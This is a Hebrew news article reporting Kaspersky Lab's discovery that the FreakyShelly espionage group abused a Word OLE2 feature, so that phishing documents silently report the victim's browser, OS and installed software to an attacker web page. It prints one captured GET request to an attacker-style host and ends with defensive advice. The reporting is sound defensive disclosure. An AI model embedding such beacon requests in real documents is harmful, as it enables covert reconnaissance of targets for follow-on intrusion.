תוקפים מנצלים מאפיין ב-WORD כדי לאסוף מודיעין על מטרות להתקפות ממוקדות
מאת:
מערכת Telecom News, 1.10.17, 18:29
המאפיין שלא תועד: טכניקת ההתקפה פועלת גם על גרסאות המחשב וגם על גרסאות הניידים של WORD. דווח על הבעיה למיקרוסופט, אבל טרם הופץ עבורה תיקון מלא. איך נמנעים מליפול קורבן למתקפה שכזו?
מומחי מעבדת קספרסקי חשפו מאפיין ב-
WORD - התוכנה הנפוצה ליצירת מסמכים, שנוצל ע"י תוקפים כדי להוציא לפועל התקפות ממוקדות. אפליקציה זדונית, שמופעלת כאשר נפתח מסמך פשוט של התוכנה, שולחת באופן אוטומטי מידע אודות התוכנה המותקנת על גבי מכשיר הקורבן אל התוקפים, ללא צורך בפעולה מצד המשתמש. המידע מאפשר לתוקפים להבין את סוג כלי הפריצה שעליהם להפעיל כדי לפרוץ למכשיר המטרה, לא משנה באיזה מכשיר נפתח המסמך.
טכניקת ההתקפה פועלת גם על גרסאות המחשב וגם על גרסאות הניידים של התוכנה הנפוצה לעריכת מסמכים. החברה הבחינה בשיטה הזו לבניית פרופיל מטרה במסגרת פעילות של שחקן ריגול סייבר אחד לפחות, שמכונה ע"י החוקרים
FreakyShelly. החברה דיווחה על הבעיה למיקרוסופט, אבל טרם הופץ עבורה תיקון מלא.
לפני זמן מה, במהלך מחקר של התקפות ממוקדות, שבוצעו ע"י
FreakyShelly, חוקרי מעבדת קספרסקי זיהו דואר אלקטרוני לפישינג ממוקד עם מסמכים בפורמט
OLE2- (המשתמש ב-
Object Linking וטכנולוגיית הטמעה כדי ליצור מסמכים מורכבים המכילים מידע ממספר מקורות, כולל מהאינטרנט).
מבט חטוף בקובץ לא עורר חשש או חוסר אמון - הוא כלל מערך של טיפים חיוניים כיצד לעשות את השימוש הטוב ביותר במנוע החיפוש של
גוגל, והוא לא הכיל כלי פריצה או קוד זדוני.
עם זאת, בחינה עמוקה יותר של התנהגות המסמך הראתה, שכאשר הוא נפתח, המסמך שולח מסיבה מסוימת בקשת
GET לעמוד אינטרנט חיצוני. בקשת ה-
GET מכילה מידע לגבי הדפדפן, שנמצא בשימוש במכשיר, גרסת מערכת ההפעלה, וכן נתונים לגבי תוכנה נוספת, שהותקנה במכשיר המותקף. הבעיה היא, שהאפליקציה לא הייתה אמורה לשלוח שום סוג של נתון לדף האינטרנט הזה.
GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive
מחקר נוסף, שביצעה החברה הראה, שההתקפה מתבססת על כך, שמידע טכני לגבי אלמנטים במסמך מאוחסן בתוכו. כל מסמך דיגיטלי מכיל נתוני מטא אודות הסגנון שלו, מיקום הטקסט והמקור, מהיכן יש לקחת תמונות למסמך (אם ישנן) ופרמטרים נוספים.
ברגע שנפתחה, אפליקציית עריכת המסמכים אמורה לקרוא את הפרמטרים האלה ואז לבנות את המסמך, כשהם משמשים כעין "מפה". עפ"י תוצאות החקירה, התוקפים הצליחו לשנות את הפרמטרים האחראים להצבעה על מיקום התמונות במסמך, באמצעות מניפולציה של הקוד, ולגרום למסמך לדווח לדף האינטרנט, שבבעלות התוקפים.
.
כדי להימנע מליפול קורבן להתקפה שכזו, מומלץ למשתמשים לעקוב אחר ההנחיות הבאות:
- להימנע מלפתוח דואר אלקטרוני, שהגיע ממקור בלתי ידוע ולהימנע מפתיחה של כל קובץ המצורף להודעה שכזו.
- להשתמש בפתרון אבטחת מידע מוכח המסוגל לזהות התקפות שכאלה.
אלכסנדר ליסקין, מנהל קבוצת זיהוי היוריסטי, מעבדת קספרסקי: "על אף שמאפיין זה אינו מאפשר התקפה זדונית, הוא מסוכן, מכיוון שהוא תומך בפעילות זדונית כשהוא דורש אינטראקציה אפסית של המשתמש. בנוסף, הוא מסוגל להגיע לאנשים רבים ברחבי העולם מאחר שהתוכנה נפוצה מאוד. עד עתה ראינו את המאפיין הזה נמצא בשימוש רק במקרה אחד. עם זאת, בהינתן העובדה, שקשה מאוד לזהותו, אנו משערים, שותר תוקפים ישתמשו בטכניקה זו בעתיד".
המחקר המלא עם שלבי זיהוי פעולת התקיפה שלב אחר שלב בליווי תמונות - כאן.